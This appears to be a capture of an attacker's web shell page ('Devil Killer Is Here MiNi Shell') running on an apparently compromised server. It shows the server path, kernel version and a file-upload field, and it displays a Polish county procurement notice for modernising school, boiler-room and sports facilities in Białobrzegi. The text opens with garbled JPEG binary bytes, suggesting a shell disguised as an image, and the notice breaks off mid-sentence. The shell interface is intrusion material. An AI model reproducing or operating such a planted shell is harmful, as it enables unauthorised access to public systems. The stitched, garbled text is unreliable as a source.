JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220831/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220831/0032628001-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Modernizacja budynków użyteczności publicznej i infrastruktury sportowej </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">POWIAT BIAŁOBRZESKI</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 670223132</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plac Zygmunta Starego 9</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Białobrzegi</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">26-800</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL921 - Radomski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">486133414</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">486133420</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@bialobrzegipowiat.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bialobrzegipowiat.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Modernizacja budynków użyteczności publicznej i infrastruktury sportowej </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-406841a1-28fb-11ed-8832-4e4740e186ac</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00326280</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-08-31</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00030450/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.3 Modernizacja budynków użyteczności publicznej i infrastruktury sportowej</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.bialobrzegipowiat.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">www.bialobrzegipowiat.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">A.Informacje ogólne1. Komunikacja w postępowaniu, w tym składanie ofert, wymiana informacji oraz<br/>przekazywanie dokumentów lub oświadczeń między Zamawiającym w Wykonawcą, odbywać się<br/>będzie przy użyciu środków komunikacji elektronicznej. 2. komunikacja ustna dopuszczalna jest w toku<br/>negocjacji oraz w odniesieniu do informacji, które nie są istotne, w szczególności nie dotyczą<br/>ogłoszenia o zamówieniu, dokumentów zamówienia oraz ofert.3. W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu:-miniPortalu,<br/>dostępnego pod adresem: https://miniportal.uzp.gov.pl/ - złożenie ofert- oraz poczty elektronicznej, na<br/>adres: sekretariat@bialobrzegipowiat.pl - adres skrzynki podawczej: EPUAP /1o1v31tlon/SkrytkaESP.<br/>Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących<br/>formularzy: „Formularz do złożenia, zmiany, wycofania oferty” oraz do „Formularza do<br/>komunikacji”.6.Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów<br/>elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy<br/>ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach<br/>korzystania z elektronicznej platformy usług administracji publicznej (ePUAP), dostępnych pod<br/>linkiem:https://www.uzp.gov.pl/e-zamowienia2/miniportal 7. Maksymalny rozmiar plików przesyłanych<br/>za pośrednictwem dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania oferty lub<br/>wniosku” i „Formularza do komunikacji” wynosi 150 MB. 8. Za datę przekazania oferty, wniosków,<br/>zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub<br/>oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP. 9. Dane<br/>postępowanie można wyszukać na Liście wszystkich postępowań w miniPortalu klikając wcześniej<br/>opcję „Dla Wykonawców” lub ze strony głównej z zakładki Postępowania.B. Złożenie<br/>oferty1.Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty” dostępnego na ePUAP i udostępnionego również na miniPortalu. Funkcjonalność do<br/>zaszyfrowania oferty przez Wykonawcę jest dostępna dla wykonawców na miniPortalu, w szczegółach<br/>danego postępowania. W formularzu oferty Wykonawca zobowiązany jest podać adres skrzynki<br/>ePUAP, na którym prowadzona będzie korespondencja związana z postępowaniem. 2. Ofertę należy<br/>sporządzić w języku polskim. 3. Ofertę składa się, pod rygorem nieważności, w formie elektronicznej<br/>(tj. postać elektroniczna opatrzona kwalifikowanym podpisem elektronicznym) lub w postaci<br/>elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.4. Sposób złożenia oferty, w<br/>tym zaszyfrowania oferty opisany został w „Instrukcji użytkownika”, dostępnej na<br/>stronie:https://miniportal.uzp.gov.pl/ C. Sposób komunikowania się Zamawiającego z Wykonawcami<br/>(nie dotyczy składania ofert)1. W postępowaniu o udzielenie zamówienia we wszelkiej korespondencji<br/>związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się oznaczeniem<br/>postępowania (AR.272.5.2022.MN).2. Zamawiający będzie komunikować się z Wykonawcami za<br/>pomocą poczty elektronicznej, e-mail: sekretariat@bialobrzegipowiat.pl, przy czym nie jest możliwe<br/>złożenie na adres poczty e-mail oferty. Złożenie oferty następuje wyłącznie przez Mini Portal.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">www.bialobrzegipowiat.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia 4 maja 2016<br/>r., str. 1; zwanym dalej &#34;RODO&#34;) informujemy, że: 1. administratorem Pani/Pana danych osobowych<br/>jest Starostwo Powiatowe w Białobrzegach; 2. administrator wyznaczył Inspektora Danych<br/>Osobowych, z którym można się kontaktować pod adresem e-mail: inspektor@cbi24.pl 3. Pani/Pana<br/>dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z<br/>przedmiotowym postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie<br/>podstawowym.4. odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym<br/>udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy P.Z.P. 5. Pani/Pana<br/>dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 P.Z.P. przez okres 4 lat od dnia<br/>zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata,<br/>okres przechowywania obejmuje cały czas trwania umowy; 6. obowiązek podania przez Panią/Pana<br/>danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w<br/>przepisanych ustawy P.Z.P., związanym z udziałem w postępowaniu o udzielenie zamówienia<br/>publicznego. 7. w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w<br/>sposób zautomatyzowany, stosownie do art. 22 RODO. 8. posiada Pani/Pan: a) na podstawie art. 15<br/>RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w przypadku, gdy skorzystanie z<br/>tego prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku może zostać<br/>Pani/Pan zobowiązana do wskazania dodatkowych informacji mających na celu sprecyzowanie<br/>żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego<br/>lub konkursu albo sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie<br/>zamówienia); b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych<br/>(skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie<br/>zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą PZP oraz<br/>nie może naruszać integralności protokołu oraz jego załączników); c)na podstawie art. 18 RODO<br/>prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>okresu trwania postępowania o udzielenie zamówienia publicznego lub konkursu oraz przypadków, o<br/>których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w<br/>odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w<br/>celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu<br/>publicznego Unii Europejskiej lub państwa członkowskiego); d)prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych<br/>Pani/Pana dotyczących narusza przepisy RODO; 9. nie przysługuje Pani/Panu:a) w związku z art. 17<br/>ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych; b)prawo do przenoszenia danych<br/>osobowych, o którym mowa w art. 20 RODO;c)na podstawie art. 21 RODO prawo sprzeciwu, wobec<br/>przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych<br/>osobowych jest art. 6 ust. 1 lit. c RODO; 10. przysługuje Pani/Panu prawo wniesienia skargi do organu<br/>nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych osobowych przez<br/>administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych<br/>Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">nie dotyczy</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">AR.272.5.2022.MN</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest realizacja robót budowlanych i modernizacyjnych miejsc należących do Powiatu Białobrzeskiego, tj.: budynku Liceum Ogólnokształcącego przy ul. Targowickiej 3 w Białobrzegach, kotłowni w budynku przy ul. Żeromskiego 84, kotłowni w budynku Domu Pomocy Społecznej w Niedabylu, kompleksu boisk Orlik przy Zespole Szkół Ponadpodstawowych.<br/>Zakres rzeczowy zamówienia obejmuje m.in. roboty budowlano-modernizacyjne:<br/>w oparciu o dokumentację projektową:<br/><br/>Liceum Ogólnokształcące w Białobrzegach<br/><br/>o	remont elewacji budynku (wraz z dociepleniem ścian styropianem) i robotami towarzyszącymi tj. wymiana okien, drzwi wejściowych, obróbek blacharskich, parapetów, rynien i rur spustowych, remont cokołu z wykonaniem opaski wokół budynku<br/>o	remont pokrycia dachowego papowego z remontem kominów na dachu, wykonaniem nowych obróbek blacharskich<br/>o	docieplenie stropodachu granulatem z wełny mineralnej<br/>o	wymiana instalacji odgromowej<br/>o	montaż rolet wewnętrznych w oknach oraz częściowo rolet zewnętrznych<br/>o	wymiana drzwi do łączników <br/>o	wymiana grzejników w budynku wraz z zaworami termostatycznymi i montażem zabudów grzejnikowych<br/>o	remont pomieszczeń w podpiwniczeniu (sale lekcyjne, szatnie) tj. wymiana podłóg, malowanie itp.<br/>o	wymiana drzwi wewnętrznych w podpiwniczeniu<br/>o	wymiana opraw oświetleniowych na energooszczędne (typu LED) w pomieszczeniach ze starym typem oświetlenia<br/>o	pozostałe roboty towarzyszące<br/>o	remont osłony śmietnikowej zlokalizowanej na terenie działki<br/>o	instalacja fotowoltaiczna<br/>o	prace towarzyszące<br/><br/>Orlik przy Zespole Szkół Ponadpodstawowych w Białobrzegach<br/><br/>o	Wymiana nawierzchni na boisku do piłki nożnej wraz z koniecznym uzupełnieniem podbudowy i wklejeniem linii,<br/>o	Wymiana siatki ogrodzenia boisk,<br/>o	Wymiana siatek bramkowych,<br/>o	Wymiana siedzisk z PCV na trybunach,<br/>o	Remont nawierzchni boiska wielofunkcyjnego do koszykówki, siatkówki i piłki ręcznej:<br/>- wycinanie i uzupełnienie istniejącej nawierzchni EPDM,<br/>- czyszczenie i gruntowanie istniejącej nawierzchni wraz z klejeniem spękań,<br/>- wykonanie nowego natrysku z poliuretanu wraz z malowaniem linii,<br/>o	Wymiana tablic i obręczy do koszykówki.<br/><br/>Kotłownia w budynku Starostwa Powiatowego przy ul. Żeromskiego 84 w Białobrzegach <br/><br/>o	demontaż istniejących kotłów;<br/>o	demontaż istniejącej armatury towarzyszącej (pompy, zawory odcinające, rozdzielacze, naczynia wzbiorcze itp.);<br/>o	demontaż istniejącego orurowania;<br/>o	demontaż istniejących przewodów spalinowych poziomych i pionowych;<br/>o	dostosowanie wentylacji grawitacyjnej nawiewnej i wywiewnej do obowiązujących przepisów;<br/>o	wymiana istniejącej stolarki drzwiowej i okiennej na stolarkę spełniającą obowiązujące przepisy;<br/>o	dostosowanie instalacji elektrycznej do obowiązujących przepisów;<br/>o	remont ogólny pomieszczenia kotłowni (wymiana posadzki, uzupełnienie tynków oraz malowanie);<br/>o	przebudowa instalacji gazowej wewnętrznej;<br/>o	przebudowa instalacji wod. i kan. w obrębie kotłowni;<br/>o	montaż 2 kotłów gazowych kondensacyjnych zasilanych gazem ziemnym;<br/>o	montaż armatury towarzyszącej (pomp, zaworów odcinających, rozdzielaczy, naczyń wzbiorczych itp.);<br/>o	montaż orurowania wraz z wykonaniem jego izolacji;<br/>o	płukanie instalacji oraz próby ciśnieniowe.<br/><br/>Paliwem dla zmodernizowanej kotłowni będzie gaz ziemny dostarczany z istniejącego przyłącza gazowego.<br/><br/>Kotłownia w budynku DPS w Niedabylu.<br/><br/>o	demontaż istniejących kotłów;<br/>o	demontaż istniejącej armatury towarzyszącej (pompy, zawory odcinające, rozdzielacze, naczynia wzbiorcze itp.);<br/>o	demontaż istniejącego orurowania;<br/>o	demontaż istniejących przewodów spalinowych poziomych i pionowych;<br/>o	dostosowanie wentylacji grawitacyjnej nawiewnej i wywiewnej do obowiązujących przepisów;<br/>o	wymianę istniejącej stolarki drzwiowej i okiennej na stolarkę spełniającą obowiązujące przepisy;<br/>o	dostosowanie instalacji elektrycznej do obowiązujących przepisów;<br/>o	remont ogólny pomieszczenia kotłowni (wymiana posadzki, uzupełnienie tynków oraz malowanie);<br/>o	przebudowę instalacji gazowej wewnętrznej;<br/>o	przebudowę instalacji wod. i kan. w obrębie kotłowni;<br/>o	montaż kotła gazowego kondensacyjnego zasilanego gazem płynnym (propan-butan);<br/>o	montaż armatury towarzyszącej (pomp, zaworów odcinających, rozdzielaczy, naczyń wzbiorczych itp.);<br/>o	montaż orurowania wraz z wykonaniem jego izolacji;<br/>o	płukanie instalacji oraz próby ciśnieniowe.<br/><br/>Dalszy opis przedmiotu zamówienia w SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">370 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają poniższe warunki<br/>udziału w postępowaniu dotyczące zdolności technicznej lub zawodowej: a) Wykonawca w<br/>okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia<br/>działalności jest krótszy – w tym okresie, wykonał, a w przypadku świadczeń okresowych lub<br/>ciągłych – wykonuje, co najmniej 1 robotę budowlaną polegającą na remoncie lub przebudowie<br/>lub modernizacji lub odbudowie lub budowie budynku o wartości robót co najmniej 500 000,00 zł<br/>brutto. b) Wykonawca dysponuje, albo będzie dysponował w okresie realizacji zamówienia:<br/>- kierownikiem robót w specjalności konstrukcyjno-budowlanej, pełniący jednocześnie rolę<br/>kierownika budowy, posiadającym uprawnienia do wykonywania samodzielnych funkcji<br/>technicznych w budownictwie w specjalności konstrukcyjno-budowlanej lub inne uprawnienia<br/>umożliwiające wykonywanie tych samych czynności, do wykonywania których uprawniają<br/>uprawnienia ww. specjalności umożliwiające zrealizowanie przedmiotowego zamówienia.<br/>-kierownikiem robót w specjalności elektroenergetycznej posiadającym uprawnienia do<br/>wykonywania samodzielnych funkcji technicznych w budownictwie w specjalności instalacyjnej w<br/>zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub inne uprawnienia<br/>umożliwiające wykonywanie tych samych czynności, do wykonywania, których w aktualnym<br/>stanie prawnym uprawniają uprawnienia budowlane w/w specjalności umożliwiające<br/>zrealizowanie przedmiotowego zamówienia.<br/>-kierownikiem robót w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych,<br/>wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń lub inne<br/>uprawnienia umożliwiające wykonywanie tych samych czynności, do wykonywania których<br/>uprawniają uprawnienia ww. specjalności umożliwiające zrealizowanie przedmiotowego<br/>zamówienia.<br/>Zamawiający dopuszcza pełnienie funkcji kierowników robót w w/w specjalnościach przez jedną<br/>osobę pod warunkiem posiadania wymaganych uprawnień dla poszczególnych branż.<br/>2. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, w<br/>stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać<br/>na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej<br/>podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nim<br/>stosunków prawnych. 3. Wykonawca, który polega na zdolnościach lub sytuacji podmiotów<br/>udostępniających zasoby składa wraz z ofertą zobowiązanie podmiotu udostępniającego zasoby<br/>do oddania mu do dyspozycji<br/>niezbędnych zasobów na potrzeby realizacji zamówienia lub inny podmiotowy środek dowodowy<br/>potwierdzający, że wykonawca realizując zamówienie będzie dysponował 